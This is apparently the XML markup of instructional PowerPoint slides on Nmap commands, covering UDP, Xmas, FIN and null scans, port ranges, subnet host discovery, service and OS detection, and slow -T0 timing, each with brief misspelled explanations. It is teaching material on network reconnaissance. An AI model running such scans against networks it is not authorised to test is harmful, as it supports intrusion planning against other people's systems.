              <a:t>&gt;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639301-15FC-1E01-D339-7828B0AD149B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="323298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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94EBFE48-F427-D0AB-9675-98ECB344736C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872966" y="3106765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 scan port </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413426178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BA35AF-F774-4AC0-F36A-EA4C0AC7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2C086D-5483-FDE7-38E7-ACB4D24B6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69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CACEE65-8317-761A-3D8A-F8B00EB7D554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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5D1C31F-98A8-7B2E-3779-8272A560879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27955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D56B8C4D-ED37-7855-A875-13E4EFAC17B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27955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137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17E1499-3674-4585-E7D2-0F784B712E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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45BD9D41-E5D8-2088-A978-B9A497862D1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94EDE829-5E37-986B-5401-8951FBB54D55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2997" y="108338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F0EF3E3B-769B-F76A-E2D7-C0F2D8BFD107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4757BDEA-2A0D-0DEC-9341-2F88DA830B25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02C831D3-8607-FDD8-81A4-966027E1BC6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8BF9B2DE-3431-4F6F-4151-76328BB7A8CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Nmap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386FA10-5090-43F3-8F85-9148F7D81F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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02832015-BECC-00A2-1C7F-5FC572E59A76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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137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91F89F84-06F2-817E-D94D-D83E5B5B94E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>4.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" spc="-10" dirty="0"/>
              <a:t>command Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 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44F98C3F-C0F7-2682-34F2-27D9933E1244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  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E9E9E1D-DC72-8F07-5AD6-E474229C5BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC56732-3D3F-87EE-EC96-0F5081CBFAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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port UDP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9FCA26EA-BE6C-101F-364E-33544169B7E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396893" y="2329984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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;    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BAC9D6-1BB2-7C59-339F-FA5630100060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87ABCB89-BD3C-EE25-4540-351C1E9D45E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962001" y="2195723"/>
            <a:ext cx="385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detected firewall by flag FIN,URG,PSH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6500AB-D2AF-593F-651C-C161D6A801EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C37BDAE-BB0B-E225-E00D-A141791C7F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154856" y="2740228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port 1-1000</a:t>
            </a:r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A24A24BC-BBEA-0FE8-1F97-4A38FDE9E3BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-526609" y="2657388"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p1-1000 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E764C89D-7556-47EA-C890-D246211DC47B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17346" y="30257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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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CF2E1D-1511-462D-BE54-D098443739CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="323298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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF1C2B3-CD2B-6F4D-9E6E-691CD5DE6E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872966" y="3106765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detected firewall by flag FIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="347330563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808216-631A-B677-3FC3-EC84835F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FD853E-403A-88DE-6192-C54DB416A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69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8E71C794-9D13-792A-14B9-1754504C30AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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0CEF27C-57A4-C566-6537-D3762A20855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27955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D9403723-56BB-83E5-4326-0F0F2C97546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27955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138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DB66CC9-A193-28BE-AC94-25A64B499451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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7C3D5E09-3C36-13CA-4C01-23120CAAEA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CDCE6B1E-7869-A0A6-65FA-4EC71EC89F3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2997" y="108338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8E06BB2B-8EB3-6C02-14B8-36C49CA6686C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3477D97D-FCC5-A708-0053-D17B26EC5729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FBFC6502-90ED-E8A4-1D68-0495F5BAC48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CACA93A8-05D8-968F-C86E-397BF1E3EDA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Nmap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F9824535-048E-572A-9A1F-5EE99546D7CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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2FAF2A3C-8A92-C9F9-D742-A85515EBBD0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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138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B4ABE7D6-6FB6-FBEA-B57C-2676AFC96A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>4.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" spc="-10" dirty="0"/>
              <a:t>command Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 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AE60691E-604F-B636-17F0-F5E40C519289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  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5ECDE2-78C3-D194-684C-F97D93FADB7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A4F3FA-1CB5-50E5-8E26-A998E1A1AF61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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detected firewall 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200796D3-E822-DE44-AA27-43139B47DC50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396893" y="2329984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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;/24    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34939E-698B-D30E-84B6-E9E7B4ABE46E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1480BD1B-0936-E01B-F86C-6091E9988C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962001" y="2195723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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>diveces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netwok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B92D64-4A12-1C02-1170-3480385CFBDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BDE202-2144-1034-E6D2-C99B8EC9FDE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154856" y="2740228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Detalis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> info scan port</a:t>
            </a:r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0F2D8DB8-36F1-D5C7-D4EE-0D7CA500E629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-526609" y="2657388"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –v &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A928E69A-AE7E-3C14-B704-1E43768DB0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17346" y="30257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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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D8CFCF-8E71-1916-3779-B5452FC7D589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="323298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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86CA004C-6ECE-F5E3-3424-99B85D32BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3872966" y="3106765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details info scan port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383258357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4B521E-1945-4679-8E47-599DAE32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8E586F5-932D-AEAA-1A61-AF52976C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69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D496DA6-BB13-8861-1474-2CDB02467539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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F4F6833-C4B9-0563-BE63-71FBCB50F3B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27955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DEB40B3-5B08-25B0-E167-95005E91E6B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27955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139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393909D-B3D4-08C3-AA32-3B894A610CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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B3A205A5-C7F3-AA38-F219-159BDEBCEBB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CB88FF30-8F39-DAA6-8896-0B21E4A1CC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2997" y="108338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3F0E2000-5573-E35E-D47F-2550324F2909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EC5663F3-A8D9-F56B-3CCD-11C826A84C3E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8AA83EAE-FE3E-CDAB-D39B-26C9E7665C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752DE001-5270-4948-9B15-92B8A9501C5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Nmap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F1E02384-4DB9-AD0C-59A1-7CF00D67490C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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F02BD502-18A0-0515-2D91-A1C2DDC805B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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139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9B2D0FDD-72F7-F629-DB5C-76BE40A71388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>4.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" spc="-10" dirty="0"/>
              <a:t>command Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 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BA803424-3750-E672-288F-F432592521A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  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676097-FC19-661C-567B-B84E15BAB50E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65CBA129-B18F-001C-DC80-B949E99F2500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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serves in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> target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66497B9E-0CC3-2814-E334-C394C1C3F47E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396893" y="2329984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–O &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;     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21A10C-AA42-48CD-E2E0-F34E4EB6EB71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDE0972-8014-69FC-F263-F33609BA20BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4782247" y="2306832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operant system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5A69816-9576-4DB8-5DC4-9587550F2BF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B0C2AC5-891C-4171-9F29-05C2CE931DFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154856" y="2740228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info in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> target </a:t>
            </a:r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5894E2B8-0981-D6F8-DA6F-D0A097A25CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-526609" y="2657388"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –A &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A29B3D3-AE5C-78AC-2052-56A89606B854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17346" y="30257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–T0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;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93463D-1D89-C4E4-E1F8-03C191F8F5ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="323298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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
